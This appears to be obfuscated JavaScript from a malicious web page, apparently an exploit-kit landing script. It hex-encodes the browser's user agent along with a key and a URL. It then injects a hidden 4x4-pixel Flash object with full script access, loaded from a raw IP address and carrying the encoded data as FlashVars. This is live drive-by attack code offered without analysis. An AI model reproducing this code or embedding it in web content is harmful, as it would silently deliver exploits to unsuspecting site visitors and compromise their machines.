/*s28442d20550hssfj44055fs*/function hgfgerdfgdf(num, width){/*s18807d1416hfj71062fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s89674d61450hfj35460fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s8219d48486hfj1984fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s10845d20545hfj41300fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd99388hfs*/c += b + d;/*s52364d82424hfj16620fs*/e += 1;}return c;}/*s98470dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.35.208/?shield&new=xX_QMvWdbRXQCJ3EKvrcT6NEMVHRHECL2YydmrHQefjaeVWkzrHFTF_yozKASwSG6_FtdfJRD&tweaks=NDkwMDQyMTc=&slim=QHij0OAcgRgyYlcUl4R9a_42kPdzBWdiMKC_BWFYwhE_8eUFrQ82Qj8mrMkecgmzxWy6yIXmg&shield=MTk0MTk2MDI=", ghnvbn("http://188.225.35.208/?around&tweaks=NTIzMTkyNzY=&new=x3zQd_WeaR2PC4jBM_rdT6FEMU3OHEeKwYyfmrDTF5yoejaiz7KSEhzy6V-tSDvTgfFOLLZSIgGyjBqBOQQ0neFfEFtK9f6skECVyE6dwJWy_B&slim=eMYgtD_ZKUHbM62Qj0yLMUcs8lxRSE6zdSmOgVUF8R4gsbnfvJFqDJrEhyVkMzUw3Lep8koxjAVya9NDNy1PWLQjp3m-zM9PR1mJYd10Ophw0q&shield=Mzk2Mzc2MjQ=","gexywoaxor"));